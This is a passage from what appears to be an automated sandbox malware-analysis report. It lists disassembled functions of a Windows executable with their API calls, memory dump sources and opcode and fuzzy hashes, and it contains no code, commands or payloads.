                                                                                                      • Opcode ID: 0fd9ca557f51245f4f5995841fae7dfbce88245f711088f79452f8c2057a3195
                                                                                                      • Instruction ID: 25438a26ec436e8ef7cf7f32674f718d2ab4149cfd3fe61d465c0314c58d9b04
                                                                                                      • Opcode Fuzzy Hash: 0fd9ca557f51245f4f5995841fae7dfbce88245f711088f79452f8c2057a3195
                                                                                                      • Instruction Fuzzy Hash: 03123262B29A859AFB218F64D4407FD2B62AF54789F044231DF8DDBBC9DE3CD6818304
                                                                                                      Function 00007FF6C7868324 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 818f159f9ec60d8a3ccb8a97ee649dedb74a51f05c8d932addb4446d8bd33583
                                                                                                      • Instruction ID: dd5d42438adc3caf7441d4f493b21ae8bdceab5602bf7a6addf2789f7f91a7d9
                                                                                                      • Opcode Fuzzy Hash: 818f159f9ec60d8a3ccb8a97ee649dedb74a51f05c8d932addb4446d8bd33583
                                                                                                      • Instruction Fuzzy Hash: 9F112E22B15F0289EB40CF60E8552B837A4FB59769F440E35DBADC6BA4EF78D1548340
                                                                                                      Function 00007FF6C787F064 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787F0AF
                                                                                                        • Part of subcall function 00007FF6C7874AA8: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6C7874AB1
                                                                                                        • Part of subcall function 00007FF6C7874AA8: GetCurrentProcess.KERNEL32 ref: 00007FF6C7874AD6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 4036615347-1896636505
                                                                                                      • Opcode ID: b5f7bab1f60810648718f3c02c55f217caa7c3f8a4d0087c22107651c7a4ea02
                                                                                                      • Instruction ID: 1cc9f569ac57df007544c62bbacd84233d9a4af12ea7c8a3fe7a692778b92d59
                                                                                                      • Opcode Fuzzy Hash: b5f7bab1f60810648718f3c02c55f217caa7c3f8a4d0087c22107651c7a4ea02
                                                                                                      • Instruction Fuzzy Hash: AD91DF62F1F64285FB249F6294512BD2EA16F44B9AF044835FF9F877C6CE3CA842C211
                                                                                                      Function 00007FF6C78873A0 Relevance: 4.7, APIs: 3, Instructions: 167COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1791019856-0
                                                                                                      • Opcode ID: 15323dc35b5380643afaccb17bbbf6fafcd5fe42be2b6f7b592aefd2fcf5f8a7
                                                                                                      • Instruction ID: 7cb52aa57fdab4f507f338885fd4cdc68d30c1bb73407e154f6de60737a1853a
                                                                                                      • Opcode Fuzzy Hash: 15323dc35b5380643afaccb17bbbf6fafcd5fe42be2b6f7b592aefd2fcf5f8a7
                                                                                                      • Instruction Fuzzy Hash: 73618C72A0A6428AEB348F65E5802B97BB1FB94756F048236CBDED3691DF3CE451C740
                                                                                                      Function 00007FF6C787B6D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                      • Opcode ID: 34e2741d719a7a770bcff6fdfcbe398c556670bf37dfd0e5683877c0dc1a574d
                                                                                                      • Instruction ID: 25773cbb31b3dcafe5f296c5f3aeb7c32d319ba09a9235bc61c34dcf4522ad40
                                                                                                      • Opcode Fuzzy Hash: 34e2741d719a7a770bcff6fdfcbe398c556670bf37dfd0e5683877c0dc1a574d
                                                                                                      • Instruction Fuzzy Hash: 1701A221B09B8196E7409F46F8400AAAF62AF95FC1F984035EF8ED7BA6CE3CD5418340
                                                                                                      Function 00007FF6C787FFBC Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 15204871-0
                                                                                                      • Opcode ID: c0a8521e5f2ef04fb7a2e72cf07a7afd390bef3cd1bd9ca472db5c0cfa77226a
                                                                                                      • Instruction ID: 66240fb96fd28dc82652e2164595baed8fc8ac4e78e605f90c0136b024530e0e
                                                                                                      • Opcode Fuzzy Hash: c0a8521e5f2ef04fb7a2e72cf07a7afd390bef3cd1bd9ca472db5c0cfa77226a
                                                                                                      • Instruction Fuzzy Hash: 2BB15877A05B898AEB55CF29C8863683BA0F784B49F148932DBAD877A4CF39D451C700
                                                                                                      Function 00007FF6C7871DCC Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $
                                                                                                      • API String ID: 0-227171996
                                                                                                      • Opcode ID: ea54e483821b9b585bba927afcc53d8d4122b8042ca37fd65b9a449894c8b1f5
                                                                                                      • Instruction ID: c65627d794b6ecd0d456b198c59605386a22e59a84f581b636013469566dd079
                                                                                                      • Opcode Fuzzy Hash: ea54e483821b9b585bba927afcc53d8d4122b8042ca37fd65b9a449894c8b1f5
                                                                                                      • Instruction Fuzzy Hash: 81E1A432F1A64686EB688F2585501397BB0FF85B8AF145235EB9F83B94DF39E841C740
                                                                                                      Function 00007FF6C7889940 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateErrorFreeLast_invalid_parameter_noinfo
                                                                                                      • String ID: Syst$emRo
                                                                                                      • API String ID: 3343701069-2127360862
                                                                                                      • Opcode ID: 9d07e6c32548864c38c6faaaf968178281bc58e58e2cd6ab6700fd2e8a7205e9
                                                                                                      • Instruction ID: 08c20e2bd070c57dce0ff8b8904c9e14575a3630d6467ac0b3b4c7408c0ab021
                                                                                                      • Opcode Fuzzy Hash: 9d07e6c32548864c38c6faaaf968178281bc58e58e2cd6ab6700fd2e8a7205e9
                                                                                                      • Instruction Fuzzy Hash: 53B1CF22F0A6A685FB10DF6298402BE2F95AB45B95F544532EFDE977C6DE3CE442C300
                                                                                                      Function 00007FF6C787D534 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 0-3030954782
                                                                                                      • Opcode ID: 48b83eaa1f7a4ed3201df91a3c56949a8b18634d0d61c8869b8135d0c886aac4
                                                                                                      • Instruction ID: f1b0e29ee7bf08f7d5dd0dc9a29fb0b48c3b84d12a619f10bad59beed1cc3908
                                                                                                      • Opcode Fuzzy Hash: 48b83eaa1f7a4ed3201df91a3c56949a8b18634d0d61c8869b8135d0c886aac4
                                                                                                      • Instruction Fuzzy Hash: 46515662B1DAC586E7248F35A802769AFD1E744B94F48C232EBEDCBAC5CE3DD4418710
                                                                                                      Function 00007FF6C7884518 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010374628-0
                                                                                                      • Opcode ID: d0e445866eaa508503fb2f36fe486fea29bc6fd6049b1895d0e72a7f8bbc9763
                                                                                                      • Instruction ID: 9c9a1a57b198871475cddb491fd94e0443e51dd099ab4327855495489439ccdb
                                                                                                      • Opcode Fuzzy Hash: d0e445866eaa508503fb2f36fe486fea29bc6fd6049b1895d0e72a7f8bbc9763
                                                                                                      • Instruction Fuzzy Hash: A9029122B0F64740FE65AF5198042792F82AF41BA2F544636EFFECA7D2DE3CA4419310
                                                                                                      Function 00007FF6C7875A90 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 1807457897-0
                                                                                                      • Opcode ID: fb7c3a666b4eeb12f08861890a0b2c40aaef9b1a10d73a0367f06851d4d0ddba
                                                                                                      • Instruction ID: 8497d2a478c63b876c6d71ba068446f63ff6a07d7640e56bd36339141c5341ea
                                                                                                      • Opcode Fuzzy Hash: fb7c3a666b4eeb12f08861890a0b2c40aaef9b1a10d73a0367f06851d4d0ddba
                                                                                                      • Instruction Fuzzy Hash: 0812BC22A09BC586E762CF2894442FD7BA4FB59749F059235EFDD83696EF38E184C300
                                                                                                      Function 00007FF6C7885410 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e17d682c6eddcbfa79061720344f82b472c676e49693c44b28231fa687ab961
                                                                                                      • Instruction ID: eea2a4bbbfdca0b37071e60f85454bae67febb6ba7b2d5412ed2ebc2eac8fc80
                                                                                                      • Opcode Fuzzy Hash: 9e17d682c6eddcbfa79061720344f82b472c676e49693c44b28231fa687ab961
                                                                                                      • Instruction Fuzzy Hash: 5BE18136A05B8586E720DF61E4406EE2BA4FB55B89F404536DFDD93B96EF38E245C300
                                                                                                      Function 00007FF6C78875F0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 673564084-0
                                                                                                      • Opcode ID: 21647bf5f1a901581b2b781f098888927de3e691a800cdebd1af8b94364231a1
                                                                                                      • Instruction ID: 585364f6b397be27bd6651a9bf89a86f44d510b232e70cfac87d943387c14482
                                                                                                      • Opcode Fuzzy Hash: 21647bf5f1a901581b2b781f098888927de3e691a800cdebd1af8b94364231a1
                                                                                                      • Instruction Fuzzy Hash: 1D318231A0A68286EF24CF79D8413BA77A1FB94786F448136DB9DC3295DF3CE4418740
                                                                                                      Function 00007FF6C7887238 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3029459697-0
                                                                                                      • Opcode ID: 0e8d1c017c5861b24aa1ef3d3dc2e4b713c0188c8889f777299288a34aaa34eb
                                                                                                      • Instruction ID: 2cc409326ab9ff92502ce05b10bc1e68179b98da5ed793cc31e310d829515eac
                                                                                                      • Opcode Fuzzy Hash: 0e8d1c017c5861b24aa1ef3d3dc2e4b713c0188c8889f777299288a34aaa34eb
                                                                                                      • Instruction Fuzzy Hash: DD11D563E096458AEF148FA5D0806A87BB1FB90BE1F448136D7AA833D0DF28D5D1C740
                                                                                                      Function 00007FF6C78877F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocaleValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3796814847-0
                                                                                                      • Opcode ID: 0100511da3805244c625c78d0f533c9f71f1739b1ffbf849090cd61871dba526
                                                                                                      • Instruction ID: 91b01be53ff54df46ce7e0b7c8203319e6e67464ee4ad6300ca9bcecb2d504a9
                                                                                                      • Opcode Fuzzy Hash: 0100511da3805244c625c78d0f533c9f71f1739b1ffbf849090cd61871dba526
                                                                                                      • Instruction Fuzzy Hash: C4113D31F1955343EB748F75A04077E6A71EB40795F148632D7AEC36C4DE29D881C704
                                                                                                      Function 00007FF6C7887308 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3029459697-0
                                                                                                      • Opcode ID: ab0cf64d4b8a740bd5d095198b743bc8c854ebfc907ebb3f9193b94a9f782d04
                                                                                                      • Instruction ID: 454d4c504dc5ba8f7673c095cfd3f9c9d20781062477fccba2cf3b1c0dd39084
                                                                                                      • Opcode Fuzzy Hash: ab0cf64d4b8a740bd5d095198b743bc8c854ebfc907ebb3f9193b94a9f782d04
                                                                                                      • Instruction Fuzzy Hash: 4F01B562F0D28286EB144F65E4407BD7AB2EB507A6F959332DBA9872D4DF6C94808701
                                                                                                      Function 00007FF6C787B258 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099609381-0
                                                                                                      • Opcode ID: f613039b7d118f41c0f625fe762bedf4ea5f82c7899df0ef6764e50c599faac5
                                                                                                      • Instruction ID: 34c489adfeb1cb35ca26487e75ec9caa49fa5d20aca7976dee3c639f0324d2dc
                                                                                                      • Opcode Fuzzy Hash: f613039b7d118f41c0f625fe762bedf4ea5f82c7899df0ef6764e50c599faac5
                                                                                                      • Instruction Fuzzy Hash: 34F08C72B09B4582E700CF15F8801A977A1EB98B92F548035EB9DC33A4DE3CD4918300
                                                                                                      Function 00007FF6C787D0A0 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
